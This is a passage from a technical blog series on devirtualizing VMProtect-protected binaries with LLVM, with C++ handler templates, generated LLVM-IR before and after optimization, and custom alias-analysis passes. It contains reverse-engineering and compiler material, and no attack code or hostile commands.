    STACK_PUSH<uint16_t>(vsp, ZExt(value));
  } else {
    STACK_PUSH<T>(vsp, value);
  }
}

DEFINE_SEMANTIC_64(LOAD_SS_64) = LOAD<uint64_t>;
DEFINE_SEMANTIC(LOAD_SS_32) = LOAD<uint32_t>;
DEFINE_SEMANTIC(LOAD_SS_16) = LOAD<uint16_t>;
DEFINE_SEMANTIC(LOAD_SS_8) = LOAD<uint8_t>;

DEFINE_SEMANTIC_64(LOAD_DS_64) = LOAD<uint64_t>;
DEFINE_SEMANTIC(LOAD_DS_32) = LOAD<uint32_t>;
DEFINE_SEMANTIC(LOAD_DS_16) = LOAD<uint16_t>;
DEFINE_SEMANTIC(LOAD_DS_8) = LOAD<uint8_t>;

template <typename T> __attribute__((always_inline)) void LOAD_GS(size_t &vsp) {
  // Check if it's 'byte' size
  bool isByte = (sizeof(T) == 1);
  // Pop the address
  size_t address = STACK_POP<size_t>(vsp);
  // Load the value
  T value = 0;
  std::memcpy(&value, &GS[address], sizeof(T));
  // Save the result
  if (isByte) {
    STACK_PUSH<uint16_t>(vsp, ZExt(value));
  } else {
    STACK_PUSH<T>(vsp, value);
  }
}

DEFINE_SEMANTIC_64(LOAD_GS_64) = LOAD_GS<uint64_t>;
DEFINE_SEMANTIC(LOAD_GS_32) = LOAD_GS<uint32_t>;
DEFINE_SEMANTIC(LOAD_GS_16) = LOAD_GS<uint16_t>;
DEFINE_SEMANTIC(LOAD_GS_8) = LOAD_GS<uint8_t>;

By now the process should be clear. The only difference is the accessed zero-length array that will end up as base of the getelementptr instruction, which will directly reflect on the aliasing information that LLVM will be able to infer. The same kind of logic is applied to all the read or write memory accesses to the different segments.

DEFINE_SEMANTIC

In the code snippets of this section you may have noticed three macros named DEFINE_SEMANTIC_64, DEFINE_SEMANTIC_32 and DEFINE_SEMANTIC. They are the umpteenth trick borrowed from Remill and are meant to generate global variables with unmangled names, pointing to the function definition of the specialized template handlers. As an example, the ADD semantic definition for the 8/16/32/64 bits cases looks like this at the LLVM-IR level:

@SEM_ADD_64 = dso_local constant void (i64*)* @_Z3ADDIyEvRm, align 8
@SEM_ADD_32 = dso_local constant void (i64*)* @_Z3ADDIjEvRm, align 8
@SEM_ADD_16 = dso_local constant void (i64*)* @_Z3ADDItEvRm, align 8
@SEM_ADD_8 = dso_local constant void (i64*)* @_Z3ADDIhEvRm, align 8

UNDEF

In the code snippets of this section you may also have noticed the usage of a function called UNDEF. This function is used to store a fictitious __undef value after each pop from the stack. This is done to signal to LLVM that the popped value is no longer needed after being popped from the stack.

The __undef value is modeled as a global variable, which during the first phase of the optimization pipeline will be used by passes like DSE to kill overlapping post-dominated dead stores and it’ll be replaced with a real undef value near the end of the optimization pipeline such that the related store instruction will be gone on the final optimized LLVM-IR function.

Lifting a basic block

We now have a bunch of templates, structures and helper functions, but how do we actually end up lifting some virtualized code?

The high level idea is the following:

  • A new LLVM-IR function with the HelperStub signature is generated;
  • The function’s body is populated with call instructions to the VmHandler helper functions fed with the proper arguments (obtained from the HelperStub parameters);
  • The optimization pipeline is executed on the function, resulting in the inlining of all the helper functions (that are marked always_inline) and in the propagation of the values;
  • The updated state of the VmRegisters, VmPassingSlots and stores to the segments is optimized, removing most of the obfuscation patterns used by VMProtect;
  • The updated state of the virtual stack pointer and virtual instruction pointer is computed.

A fictitious example of a full pipeline based on the HelperStub function, implemented at the C++ level and optimized to obtain propagated LLVM-IR code follows:

extern "C" __attribute__((always_inline)) size_t SimpleExample_HelperStub(
  rptr rax, rptr rbx, rptr rcx,
  rptr rdx, rptr rsi, rptr rdi,
  rptr rbp, rptr rsp, rptr r8,
  rptr r9, rptr r10, rptr r11,
  rptr r12, rptr r13, rptr r14,
  rptr r15, rptr flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR, rptr vsp,
  rptr vip, VirtualRegister *__restrict__ vmregs,
  size_t *__restrict__ slots) {

  PUSH_REG(vsp, rax);
  PUSH_REG(vsp, rbx);
  POP_VMREG<64, 0>(vsp, vmregs[1]);
  POP_VMREG<64, 0>(vsp, vmregs[0]);
  PUSH_VMREG<64, 0>(vsp, vmregs[0]);
  PUSH_VMREG<64, 0>(vsp, vmregs[1]);
  ADD<uint64_t>(vsp);
  POP_VMREG<64, 0>(vsp, vmregs[2]);
  POP_VMREG<64, 0>(vsp, vmregs[3]);
  PUSH_VMREG<64, 0>(vsp, vmregs[3]);
  POP_REG(vsp, rax);

  return vip;
}

The C++ HelperStub function with calls to the handlers. This only serves as an example, normally the LLVM-IR for this is automatically generated from VM bytecode.

define dso_local i64 @SimpleExample_HelperStub(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR, i64* noalias nonnull align 8 dereferenceable(8) %vsp, i64* noalias nonnull align 8 dereferenceable(8) %vip, %struct.VirtualRegister* noalias %vmregs, i64* noalias %slots) local_unnamed_addr {
entry:
  %rax.addr = alloca i64*, align 8
  %rbx.addr = alloca i64*, align 8
  %rcx.addr = alloca i64*, align 8
  %rdx.addr = alloca i64*, align 8
  %rsi.addr = alloca i64*, align 8
  %rdi.addr = alloca i64*, align 8
  %rbp.addr = alloca i64*, align 8
  %rsp.addr = alloca i64*, align 8
  %r8.addr = alloca i64*, align 8
  %r9.addr = alloca i64*, align 8
  %r10.addr = alloca i64*, align 8
  %r11.addr = alloca i64*, align 8
  %r12.addr = alloca i64*, align 8
  %r13.addr = alloca i64*, align 8
  %r14.addr = alloca i64*, align 8
  %r15.addr = alloca i64*, align 8
  %flags.addr = alloca i64*, align 8
  %KEY_STUB.addr = alloca i64, align 8
  %RET_ADDR.addr = alloca i64, align 8
  %REL_ADDR.addr = alloca i64, align 8
  %vsp.addr = alloca i64*, align 8
  %vip.addr = alloca i64*, align 8
  %vmregs.addr = alloca %struct.VirtualRegister*, align 8
  %slots.addr = alloca i64*, align 8
  %agg.tmp = alloca %struct.VirtualRegister, align 1
  %agg.tmp4 = alloca %struct.VirtualRegister, align 1
  %agg.tmp10 = alloca %struct.VirtualRegister, align 1
  store i64* %rax, i64** %rax.addr, align 8
  store i64* %rbx, i64** %rbx.addr, align 8
  store i64* %rcx, i64** %rcx.addr, align 8
  store i64* %rdx, i64** %rdx.addr, align 8
  store i64* %rsi, i64** %rsi.addr, align 8
  store i64* %rdi, i64** %rdi.addr, align 8
  store i64* %rbp, i64** %rbp.addr, align 8
  store i64* %rsp, i64** %rsp.addr, align 8
  store i64* %r8, i64** %r8.addr, align 8
  store i64* %r9, i64** %r9.addr, align 8
  store i64* %r10, i64** %r10.addr, align 8
  store i64* %r11, i64** %r11.addr, align 8
  store i64* %r12, i64** %r12.addr, align 8
  store i64* %r13, i64** %r13.addr, align 8
  store i64* %r14, i64** %r14.addr, align 8
  store i64* %r15, i64** %r15.addr, align 8
  store i64* %flags, i64** %flags.addr, align 8
  store i64 %KEY_STUB, i64* %KEY_STUB.addr, align 8
  store i64 %RET_ADDR, i64* %RET_ADDR.addr, align 8
  store i64 %REL_ADDR, i64* %REL_ADDR.addr, align 8
  store i64* %vsp, i64** %vsp.addr, align 8
  store i64* %vip, i64** %vip.addr, align 8
  store %struct.VirtualRegister* %vmregs, %struct.VirtualRegister** %vmregs.addr, align 8
  store i64* %slots, i64** %slots.addr, align 8
  %0 = load i64*, i64** %vsp.addr, align 8
  %1 = load i64*, i64** %rax.addr, align 8
  %2 = load i64, i64* %1, align 8
  call void @_Z8PUSH_REGRmm(i64* nonnull align 8 dereferenceable(8) %0, i64 %2)
  %3 = load i64*, i64** %vsp.addr, align 8
  %4 = load i64*, i64** %rbx.addr, align 8
  %5 = load i64, i64* %4, align 8
  call void @_Z8PUSH_REGRmm(i64* nonnull align 8 dereferenceable(8) %3, i64 %5)
  %6 = load i64*, i64** %vsp.addr, align 8
  %7 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %7, i64 1
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %6, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx)
  %8 = load i64*, i64** %vsp.addr, align 8
  %9 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx1 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %9, i64 0
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %8, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx1)
  %10 = load i64*, i64** %vsp.addr, align 8
  %11 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx2 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %11, i64 0
  %12 = bitcast %struct.VirtualRegister* %agg.tmp to i8*
  %13 = bitcast %struct.VirtualRegister* %arrayidx2 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %12, i8* align 1 %13, i64 8, i1 false)
  %coerce.dive = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp, i32 0, i32 0
  %coerce.dive3 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive, i32 0, i32 0
  %14 = load i64, i64* %coerce.dive3, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %10, i64 %14)
  %15 = load i64*, i64** %vsp.addr, align 8
  %16 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx5 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %16, i64 1
  %17 = bitcast %struct.VirtualRegister* %agg.tmp4 to i8*
  %18 = bitcast %struct.VirtualRegister* %arrayidx5 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %17, i8* align 1 %18, i64 8, i1 false)
  %coerce.dive6 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp4, i32 0, i32 0
  %coerce.dive7 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive6, i32 0, i32 0
  %19 = load i64, i64* %coerce.dive7, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %15, i64 %19)
  %20 = load i64*, i64** %vsp.addr, align 8
  call void @_Z3ADDIyEvRm(i64* nonnull align 8 dereferenceable(8) %20)
  %21 = load i64*, i64** %vsp.addr, align 8
  %22 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx8 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %22, i64 2
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %21, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx8)
  %23 = load i64*, i64** %vsp.addr, align 8
  %24 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx9 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %24, i64 3
  call void @_Z9POP_VMREGILm64ELm0EEvRmR15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %23, %struct.VirtualRegister* nonnull align 1 dereferenceable(8) %arrayidx9)
  %25 = load i64*, i64** %vsp.addr, align 8
  %26 = load %struct.VirtualRegister*, %struct.VirtualRegister** %vmregs.addr, align 8
  %arrayidx11 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %26, i64 3
  %27 = bitcast %struct.VirtualRegister* %agg.tmp10 to i8*
  %28 = bitcast %struct.VirtualRegister* %arrayidx11 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 1 %27, i8* align 1 %28, i64 8, i1 false)
  %coerce.dive12 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %agg.tmp10, i32 0, i32 0
  %coerce.dive13 = getelementptr inbounds %union.anon, %union.anon* %coerce.dive12, i32 0, i32 0
  %29 = load i64, i64* %coerce.dive13, align 1
  call void @_Z10PUSH_VMREGILm64ELm0EEvRm15VirtualRegister(i64* nonnull align 8 dereferenceable(8) %25, i64 %29)
  %30 = load i64*, i64** %vsp.addr, align 8
  %31 = load i64*, i64** %rax.addr, align 8
  call void @_Z7POP_REGRmS_(i64* nonnull align 8 dereferenceable(8) %30, i64* nonnull align 8 dereferenceable(8) %31)
  %32 = load i64*, i64** %vip.addr, align 8
  %33 = load i64, i64* %32, align 8
  ret i64 %33
}

The LLVM-IR compiled from the previous C++ HelperStub function.

define dso_local i64 @SimpleExample_HelperStub(i64* noalias nocapture nonnull align 8 dereferenceable(8) %rax, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rbx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rcx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rbp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r15, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR, i64* noalias nonnull align 8 dereferenceable(8) %vsp, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %vip, %struct.VirtualRegister* noalias nocapture %vmregs, i64* noalias nocapture readnone %slots) local_unnamed_addr {
entry:
  %0 = load i64, i64* %rax, align 8
  %1 = load i64, i64* %vsp, align 8
  %sub.i.i = add i64 %1, -8
  %arrayidx.i.i = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %sub.i.i
  %value.addr.0.arrayidx.sroa_cast.i.i = bitcast i8* %arrayidx.i.i to i64*
  %2 = load i64, i64* %rbx, align 8
  %sub.i.i66 = add i64 %1, -16
  %arrayidx.i.i67 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %sub.i.i66
  %value.addr.0.arrayidx.sroa_cast.i.i68 = bitcast i8* %arrayidx.i.i67 to i64*
  %qword.i62 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 1, i32 0, i32 0
  store i64 %2, i64* %qword.i62, align 1
  %3 = load i64, i64* @__undef, align 8
  %qword.i55 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 0, i32 0, i32 0
  store i64 %0, i64* %qword.i55, align 1
  %add.i32.i = add i64 %2, %0
  %cmp.i.i.i.i = icmp ult i64 %add.i32.i, %2
  %cmp1.i.i.i.i = icmp ult i64 %add.i32.i, %0
  %4 = or i1 %cmp.i.i.i.i, %cmp1.i.i.i.i
  %conv.i.i.i.i = trunc i64 %add.i32.i to i32
  %conv.i.i.i.i.i = and i32 %conv.i.i.i.i, 255
  %5 = tail call i32 @llvm.ctpop.i32(i32 %conv.i.i.i.i.i)
  %xor.i.i28.i.i = xor i64 %2, %0
  %xor1.i.i.i.i = xor i64 %xor.i.i28.i.i, %add.i32.i
  %and.i.i.i.i = and i64 %xor1.i.i.i.i, 16
  %cmp.i.i27.i.i = icmp eq i64 %add.i32.i, 0
  %shr.i.i.i.i = lshr i64 %2, 63
  %shr1.i.i.i.i = lshr i64 %0, 63
  %shr2.i.i.i.i = lshr i64 %add.i32.i, 63
  %xor.i.i.i.i = xor i64 %shr2.i.i.i.i, %shr.i.i.i.i
  %xor3.i.i.i.i = xor i64 %shr2.i.i.i.i, %shr1.i.i.i.i
  %add.i.i.i.i = add nuw nsw i64 %xor.i.i.i.i, %xor3.i.i.i.i
  %cmp.i.i25.i.i = icmp eq i64 %add.i.i.i.i, 2
  %conv.i.i.i = zext i1 %4 to i64
  %6 = shl nuw nsw i32 %5, 2
  %7 = and i32 %6, 4
  %8 = xor i32 %7, 4
  %9 = zext i32 %8 to i64
  %shl22.i.i.i = select i1 %cmp.i.i27.i.i, i64 64, i64 0
  %10 = lshr i64 %add.i32.i, 56
  %11 = and i64 %10, 128
  %shl34.i.i.i = select i1 %cmp.i.i25.i.i, i64 2048, i64 0
  %or6.i.i.i = or i64 %11, %shl22.i.i.i
  %and13.i.i.i = or i64 %or6.i.i.i, %and.i.i.i.i
  %or17.i.i.i = or i64 %and13.i.i.i, %conv.i.i.i
  %and25.i.i.i = or i64 %or17.i.i.i, %shl34.i.i.i
  %or29.i.i.i = or i64 %and25.i.i.i, %9
  %qword.i36 = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 2, i32 0, i32 0
  store i64 %or29.i.i.i, i64* %qword.i36, align 1
  store i64 %3, i64* %value.addr.0.arrayidx.sroa_cast.i.i68, align 1
  %qword.i = getelementptr inbounds %struct.VirtualRegister, %struct.VirtualRegister* %vmregs, i64 3, i32 0, i32 0
  store i64 %add.i32.i, i64* %qword.i, align 1
  store i64 %3, i64* %value.addr.0.arrayidx.sroa_cast.i.i, align 1
  store i64 %add.i32.i, i64* %rax, align 8
  %12 = load i64, i64* %vip, align 8
  ret i64 %12
}

The LLVM-IR of the HelperStub function with inlined and optimized calls to the handlers

The last snippet is representing all the semantic computations related with a VmBlock, as described in the high level overview. Although, if the code we lifted is capturing the whole semantics related with a VmStub, we can wrap the HelperStub function with the HelperFunction function, which enforces the liveness properties described in the Liveness and aliasing information section, enabling us to obtain only the computations updating the host execution context:

extern "C" size_t SimpleExample_HelperFunction(
    rptr rax, rptr rbx, rptr rcx,
    rptr rdx, rptr rsi, rptr rdi,
    rptr rbp, rptr rsp, rptr r8,
    rptr r9, rptr r10, rptr r11,
    rptr r12, rptr r13, rptr r14,
    rptr r15, rptr flags, size_t KEY_STUB,
    size_t RET_ADDR, size_t REL_ADDR) {
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[30] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = SimpleExample_HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the next address(es)
  return vip;
}

The C++ HelperFunction function with the call to the HelperStub function and the relevant stack frame allocations.

define dso_local i64 @SimpleExample_HelperFunction(i64* noalias nocapture nonnull align 8 dereferenceable(8) %rax, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rbx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rcx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdx, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rsi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rdi, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %rbp, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %rsp, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %r15, i64* noalias nocapture nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) local_unnamed_addr {
entry:
  %0 = load i64, i64* %rax, align 8
  %1 = load i64, i64* %rbx, align 8
  %add.i32.i.i = add i64 %1, %0
  store i64 %add.i32.i.i, i64* %rax, align 8
  ret i64 0
}

The LLVM-IR HelperFunction function with fully optimized code.

It can be seen that the example is just pushing the values of the registers rax and rbx, loading them in vmregs[0] and vmregs[1] respectively, pushing the VmRegisters on the stack, adding them together, popping the updated flags in vmregs[2], popping the addition’s result to vmregs[3] and finally pushing vmregs[3] on the stack to be popped in the rax register at the end. The liveness of the values of the VmRegisters ends with the end of the function, hence the updated flags saved in vmregs[2] won’t be reflected on the host execution context. Looking at the final snippet we can see that the semantics of the code have been successfully obtained.

What’s next?

In Part 2 we’ll put the described structures and helpers to good use, digging into the details of the virtualized CFG exploration and introducing the basics of the LLVM optimization pipeline.

Tickling VMProtect with LLVM: Part 3

By: fvrmatteo
8 September 2021 at 23:00

This post will introduce 7 custom passes that, once added to the optimization pipeline, will make the overall LLVM-IR output more readable. Some words will be spent on the unsupported instructions lifting and recompilation topics. Finally, the output of 6 devirtualized functions will be shown.

Custom passes

This section will give an overview of some custom passes meant to:

  • Solve VMProtect specific optimization problems;
  • Solve some limitations of existing LLVM passes, but that won’t meet the same quality standard of an official LLVM pass.

SegmentsAA

This pass falls under the category of the VMProtect specific optimization problems and is probably the most delicate of the section, as it may be feeding LLVM with unsafe assumptions. The aliasing information described in the Liveness and aliasing information section will finally come in handy. In fact, the goal of the pass is to identify the type of two pointers and determine if they can be deemed as not aliasing with one another.

With the structures defined in the previous sections, LLVM is already able to infer that two pointers derived from the following sources don’t alias with one another:

  • general purpose registers
  • VmRegisters
  • VmPassingSlots
  • GS zero-sized array
  • FS zero-sized array
  • RAM zero-sized array (with constant index)
  • RAM zero-sized array (with symbolic index)

Additionally LLVM can also discern between pointers with RAM base using a simple symbolic index. For example an access to [rsp - 0x10] (local stack slot) will be considered as NoAlias when compared with an access to [rsp + 0x10] (incoming stack argument).

But LLVM’s alias analysis passes fall short when handling pointers using as base the RAM array and employing a more convoluted symbolic index, and the reason for the shortcoming is entirely related to the lack of type and context information that got lost during the compilation to binary.

The pass is inspired by existing implementations (1, 2, 3) that are basing their checks on the identification of pointers belonging to different segments and address spaces.

Slicing the symbolic index used in a RAM array access we can discern with high confidence between the following additional NoAlias memory accesses:

  • indirect access: if the access is a stack argument ([rsp] or [rsp + positive_constant_offset + symbolic_offset]), a dereferenced general purpose register ([rax]) or a nested dereference (val1 = [rax], val2 = [val1]); identified as TyIND in the code;
  • local stack slot: if the access is of the form [rsp - positive_constant_offset + symbolic_offset]; identified as TySS in the code;
  • local stack array: if the access if of the form [rsp - positive_constant_offset + phi_index]; identified as TyARR in the code.

If the pointer type cannot be reliably detected, an unknown type (identified as TyUNK in the code) is being used, and the comparison between the pointers is automatically skipped. If the pass cannot return a NoAlias result, the query is passed back to the default alias analysis pipeline.

One could argue that the pass is not really needed, as it is unlikely that the propagation of the sensitive information we need to successfully explore the virtualized CFG is hindered by aliasing issues. In fact, the computation of a conditional branch at the end of a VmBlock is guaranteed not to be hindered by a symbolic memory store happening before the jump VmHandler accesses the branch destination. But there are some cases where VMProtect pushes the address of the next VmStub in one of the first VmBlocks, doing memory stores in between and accessing the pushed value only in one or more VmExits. That could be a case where discerning between a local stack slot and an indirect access enables the propagation of the pushed address.

Irregardless of the aforementioned issue, that can be solved with some ad-hoc store-to-load detection logic, playing around with the alias analysis information that can be fed to LLVM could make the devirtualized code more readable. We have to keep in mind that there may be edge cases where the original code is breaking our assumptions, so having at least a vague idea of the involved pointers accessed at runtime could give us more confidence or force us to err on the safe side, relying solely on the built-in LLVM alias analysis passes.

The assembly snippet shown below has been devirtualized with and without adding the SegmentsAA pass to the pipeline. If we are sure that at runtime, before the push rax instruction, rcx doesn’t contain the value rsp - 8 (extremely unexpected on benign code), we can safely enable the SegmentsAA pass and obtain a cleaner output.

start:
  push rax
  mov qword ptr [rsp], 1
  mov qword ptr [rcx], 2
  pop rax

The assembly code writing to two possibly aliasing memory slots

define dso_local i64 @F_0x14000101f(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #2 {
  %1 = load i64, i64* %rcx, align 8, !alias.scope !22, !noalias !27
  %2 = inttoptr i64 %1 to i64*
  store i64 2, i64* %2, align 1, !noalias !65
  store i64 1, i64* %rax, align 8, !tbaa !4, !alias.scope !66, !noalias !67
  ret i64 5368713278
}

The devirtualized code with the SegmentsAA pass added to the pipeline, with the assumption that rcx differs from rsp - 8

define dso_local i64 @F_0x14000101f(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #2 {
  %1 = load i64, i64* %rsp, align 8, !tbaa !4, !alias.scope !22, !noalias !27
  %2 = add i64 %1, -8
  %3 = load i64, i64* %rcx, align 8, !alias.scope !65, !noalias !66
  %4 = inttoptr i64 %2 to i64*
  store i64 1, i64* %4, align 1, !noalias !67
  %5 = inttoptr i64 %3 to i64*
  store i64 2, i64* %5, align 1, !noalias !67
  %6 = load i64, i64* %4, align 1, !noalias !67
  store i64 %6, i64* %rax, align 8, !tbaa !4, !alias.scope !68, !noalias !69
  ret i64 5368713278
}

The devirtualized code without the SegmentsAA pass added to the pipeline and therefore no assumptions fed to LLVM

Alias analysis is a complex topic, and experience thought me that most of the propagation issues happening while using LLVM to deobfuscate some code are related to the LLVM’s alias analysis passes being hinder by some pointer computation. Therefore, having the capability to feed LLVM with context-aware information could be the only way to handle certain types of obfuscation. Beware that other tools you are used to are most likely doing similar “safe” assumptions under the hood (e.g. concolic execution tools using the concrete pointer to answer the aliasing queries).

The takeaway from this section is that, if needed, you can define your own alias analysis callback pass to be integrated in the optimization pipeline in such a way that pre-existing passes can make use of the refined aliasing query results. This is similar to updating IDA’s stack variables with proper type definitions to improve the propagation results.

KnownIndexSelect

This pass falls under the category of the VMProtect specific optimization problems. In fact, whoever looked into VMProtect 3.0.9 knows that the following trick, reimplemented as high level C code for simplicity, is being internally used to select between two branches of a conditional jump.

uint64_t ConditionalBranchLogic(uint64_t RFLAGS) {
  // Extracting the ZF flag bit
  uint64_t ConditionBit = (RFLAGS & 0x40) >> 6;
  // Writing the jump destinations
  uint64_t Stack[2] = { 0 };
  Stack[0] = 5369966919;
  Stack[1] = 5369966790;
  // Selecting the correct jump destination
  return Stack[ConditionBit];
}

What is really happening at the low level is that the branch destinations are written to adjacent stack slots and then a conditional load, controlled by the previously computed flags, is going to select between one slot or the other to fetch the right jump destination.

